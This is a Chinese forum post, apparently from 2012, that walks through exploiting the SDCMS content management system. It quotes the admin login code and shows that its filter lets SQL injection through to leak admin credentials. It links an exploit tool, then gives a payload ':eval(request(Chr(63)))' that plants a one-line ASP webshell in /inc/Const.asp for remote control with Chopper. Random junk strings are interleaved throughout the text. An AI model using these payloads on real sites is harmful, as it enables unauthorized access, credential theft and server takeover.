中国网络渗透测试联盟
标题:
SDCMS通杀漏洞利用工具及提权拿SHELL
[打印本页]
作者:
admin
时间:
2012-11-9 20:57
标题:
SDCMS通杀漏洞利用工具及提权拿SHELL
作者:T00LS 鬼哥
5 z% Z5 E& d$ h J) o( x- N9 ?( z
漏洞文件:后台目录/index.asp
2 H6 g1 P/ S8 Z! F( k0 p
) A$ X% W& W0 Y' l. q
Sub Check
7 Q Q* h5 ?: N7 l6 t9 j
Dim username,password,code,getcode,Rs
3 j. L; F1 g$ a% [5 e
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
- }0 u+ b4 i- n' w8 J4 m
username=FilterText(Trim(Request.Form("username")),1)
( }7 A! D9 U* M- r1 e" X& V
password=FilterText(Trim(Request.Form("password")),1)
3 Q$ h/ {4 Q( t1 G9 D1 I
code=Trim(Request.Form("yzm"))
, m- T$ {% f2 a! c
getcode=Session("SDCMSCode")
& {5 G' f- ~1 C4 z8 ^- u
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
* U& R* H) _3 u4 ?- f
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"
ied
z& {2 r. L$ G5 Q% q ^
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"
ied
' R, _! S/ w: p" |1 C
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"
ied
6 ^6 M) }; [" U. S {2 W
IF username="" or password="" Then
5 n9 R5 a( d( D% f$ s1 e
Echo "用户名或密码不能为空"
ied
0 T" Z) x. M7 k) a {# ` Z4 @, @
Else
# @8 k4 v6 {) A7 f* O' m
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
1 B6 I5 [& w0 k# _6 S
IF Rs.Eof Then
1 d* [& V! A/ B0 k! o' }
AddLog username,GetIp,"登录失败",1
# | `$ U5 M5 J* a! W
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
$ c' y$ D, N1 l5 X0 K
Else
: }; w* \" f) O9 [% U
Add_Cookies "sdcms_id",Rs(0)
( t* }" [5 N* L% w% P6 J
Add_Cookies "sdcms_name",username
& M; y0 [ B8 {, w( x! n& w
Add_Cookies "sdcms_pwd",Rs(2)
7 O# C/ i3 ]; {# ~! q+ p7 [
Add_Cookies "sdcms_admin",Rs(3)
1 B; ?$ o. i# t: T ^6 Z
Add_Cookies "sdcms_alllever",Rs(4)
: V! g$ \- |+ A/ w8 P l6 Q" {
Add_Cookies "sdcms_infolever",Rs(5)
4 a3 n2 j# L+ M- }& e. j
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
5 a" D/ f% R) l6 o* b5 b: ?
AddLog username,GetIp,"登录成功",1
) f) B6 F* m1 ]
'自动删除30天前的Log记录
; e: m L! E" r; |* T7 {5 t. O
IF Sdcms_DataType Then
2 f6 C8 ?$ ~+ H" H
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
4 ^ U& c9 ?. w+ q
Else
+ D: I5 p5 o0 {
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
" K7 k+ s }. p! D8 \$ Y5 {: y
End IF
# X) |: Y) C. h+ L( U
Go("sdcms_index.asp")
- `- f3 p1 V* h( [6 H' ?
End IF
( g% s# H5 F) U0 @
Rs.Close
( ^: o& m+ c- s. B- V
Set Rs=Nothing
5 C3 w8 ^3 X+ r. n: R* l) _
End IF
) |1 n! n# u% Z8 b- g9 W
End Sub
) C8 m! e9 P$ }+ R+ L% E! Q
- S3 Z+ b* F) s. G! y
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
6 J$ Q+ W% e% [' I3 s
" G, z3 _" G6 k7 f2 s: Z# r
Function FilterText(ByVal t0,ByVal t1)
) D; s; F0 _; i- k+ g& i& r2 @
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
- r6 Q4 e- Z. R o3 \+ O
t0=Trim(t0)
6 r3 }4 T6 ?" g- R
Select Case t1
6 Y2 f# G$ I! T# u) p" c# j$ F2 \
Case "1"
1 J4 O9 B7 P: ~ h( E3 J0 z" q8 x
t0=Replace(t0,Chr(32),"")
' p l3 K* L" S+ q6 s
t0=Replace(t0,Chr(13),"")
z5 e5 S* U- T7 \, t9 J
t0=Replace(t0,Chr(10)&Chr(10),"")
& P$ t( R3 r! Z p3 R
t0=Replace(t0,Chr(10),"")
) w3 e7 ^/ G' O' [( e, D
Case "2"
" R r+ M+ {, i. X; {0 _4 _; G
t0=Replace(t0,Chr(8),"")'回格
9 |8 u" v9 _; Y. H2 ]
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
0 `& H3 k6 r( ]' A' g4 [: T
t0=Replace(t0,Chr(10),"")'换行
+ W& ?; ?1 r. {. t& j
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
3 m" N& @2 C0 b {
t0=Replace(t0,Chr(12),"")'换页
( G( _7 O$ R. G/ W1 ` C# t* ]% R
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
/ }) z1 W; k% ^' }9 O
t0=Replace(t0,Chr(22),"")
4 c& Y% b0 s- n$ O. m Q' M
t0=Replace(t0,Chr(32),"")'空格 SPACE
& E3 U1 R5 g2 R
t0=Replace(t0,Chr(33),"")'!
8 h$ W. w4 K' l7 p
t0=Replace(t0,Chr(34),"")'"
6 M4 m8 l" k# I+ F, U! H, L
t0=Replace(t0,Chr(35),"")'#
! s4 Y" w$ x g( k
t0=Replace(t0,Chr(36),"")'$
5 f) t4 @0 P9 |7 }, w3 ~
t0=Replace(t0,Chr(37),"")'%
5 {% |) j( g% A: Q4 i
t0=Replace(t0,Chr(38),"")'&
' ^3 D2 \5 R/ X0 O0 l
t0=Replace(t0,Chr(39),"")''
6 q8 F y* ~* g! ~/ ?$ P
t0=Replace(t0,Chr(40),"")'(
, M$ r! E( F5 C/ h- p& B1 p9 Q
t0=Replace(t0,Chr(41),"")')
- H( c6 h+ T m
t0=Replace(t0,Chr(42),"")'*
* z- L* b, N/ b# E) `! `( k
t0=Replace(t0,Chr(43),"")'+
8 A+ U+ d2 ?5 L% a+ g* P
t0=Replace(t0,Chr(44),"")',
' A% e* k' c3 P% P5 u
t0=Replace(t0,Chr(45),"")'-
% M P) ?! x% w d( x
t0=Replace(t0,Chr(46),"")'.
6 W* q; [$ H/ |3 A8 I
t0=Replace(t0,Chr(47),"")'/
7 o" a! n/ C; `% H: _2 Y2 |
t0=Replace(t0,Chr(58),"")':
- G1 Z4 T# s% d" t7 F6 w& `
t0=Replace(t0,Chr(59),"")';
" S1 d9 y4 S9 ?& ^
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
6 f$ S/ z8 H3 f5 m5 y
t0=Replace(t0,Chr(63),"")'?
4 J1 q- j7 o$ K2 y5 w; ~
t0=Replace(t0,Chr(64),"")'@
: y! Z- W" A# z' Z2 B3 C& U# s
t0=Replace(t0,Chr(91),"")'\
+ m! g& q4 G2 T) G& P7 s+ j% |
t0=Replace(t0,Chr(92),"")'\
" U3 A: p/ G" m) L/ Y8 G9 {# b
t0=Replace(t0,Chr(93),"")']
% {" I& a$ \$ Z4 t4 o3 c
t0=Replace(t0,Chr(94),"")'^
8 {3 z! S' u$ Y
t0=Replace(t0,Chr(95),"")'_
% e" w0 ]- x/ _7 P+ H( Q+ ~
t0=Replace(t0,Chr(96),"")'`
' E6 y/ |& C! ] Q
t0=Replace(t0,Chr(123),"")'{
3 N M8 K$ _6 B0 I
t0=Replace(t0,Chr(124),"")'|
% p% v& G1 A4 S2 m' M- a+ u
t0=Replace(t0,Chr(125),"")'}
/ I9 Y7 d- v/ K8 ~' U A- O
t0=Replace(t0,Chr(126),"")'~
2 N0 V- z# ^. G9 J
Case Else
- N2 |2 K1 ~, `" Z
t0=Replace(t0, "&", "&")
( g0 t; [( D9 \, h
t0=Replace(t0, "'", "'")
' ?2 q# |: y# F6 B
t0=Replace(t0, """", """)
9 X) O% n( i( D" w E
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
9 F2 }' Q* S- l6 _5 ]3 d2 E
End Select
* x& x! l% z9 e4 l$ I. N
IF Instr(Lcase(t0),"expression")>0 Then
, K4 m( l; ]0 U
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
8 |' \0 ^' `) A1 A3 ~
End If
4 N2 d3 I. y% z3 \
FilterText=t0
" D* L2 O9 w% i: v' l9 w/ F0 _/ A
End Function
; R) q+ p5 \( Z; @/ X" U
* p7 ], {# D- |
看到没。直接参数是1 只过滤
2 s) `2 Y# e( \5 @$ x+ w6 d
t0=Replace(t0,Chr(32)," ")
; D2 l; v8 ]0 W+ M2 q1 H' ~) A
t0=Replace(t0,Chr(13),"")
3 B& K" R5 P/ F3 b
t0=Replace(t0,Chr(10)&Chr(10),"
) k* S* I6 @. D$ v0 M
")
, Q# {3 M' `0 I: Q
t0=Replace(t0,Chr(10),"
5 U. s+ e2 X" n- b. N: {$ H
")
S; J, s- k m# W/ b, o U
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
0 V* t R. D1 u* a3 J
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
# t, K1 e& w0 @2 {: R7 b
) [4 Z+ m7 m9 O6 A
测试:
0 B d7 @2 t) `/ m! H" j
( U. ~( N& _$ c6 v
+ ^: T8 T* F% i: u; D$ [/ _. ]
现在输入工具上验证码,然后点OK
- \* c1 K4 g9 S0 Z0 \& j
& T I( ?2 S& ~+ O7 N. B
7 _3 w$ L3 f2 P0 K' N0 I7 X
看到我们直接进入后台管理界面了,呵呵!
% F3 w* U" j+ c+ ~7 M) V8 Q
* K. m* p( E: Q, f. G& W& x4 N
; F- F4 r. b1 t, O# z z
- c3 X/ R$ L9 ~* X& C( y* E
这样直接进入后台了。。。。
0 W2 v+ w$ M1 Y2 k/ ?0 ~: E
( w9 \" y. r% p2 j2 K
( o( F6 r+ S7 P: J
1 F; O( s, D6 e3 X! y8 \( p( d* H( o
SDCMS提权:
2 v8 E1 T* [' d, X
. a( [, ]6 _2 Z& ^1 z6 n
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
0 u J; k/ e4 |9 n! Q( _0 L G
^6 W4 Y; H9 G4 K- U: ]) p* y) Q7 S
5 f9 X# Z3 p1 e# n7 u+ T$ `' W
: y z9 l4 j! a* }: v: [4 L5 Z+ y
OK,现在用菜刀连接下!
8 r/ V% V+ c4 ~2 @2 F+ w* p
. V0 T6 \, N2 G6 k6 p
( o$ O6 k! H+ g$ E; I& b. C
* Y) d0 Y! [1 x& I- @! _+ `, q
/ k# A& l' h* R3 Q$ s1 K5 W8 h0 ^
* k) p6 o/ X* E9 v1 p
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2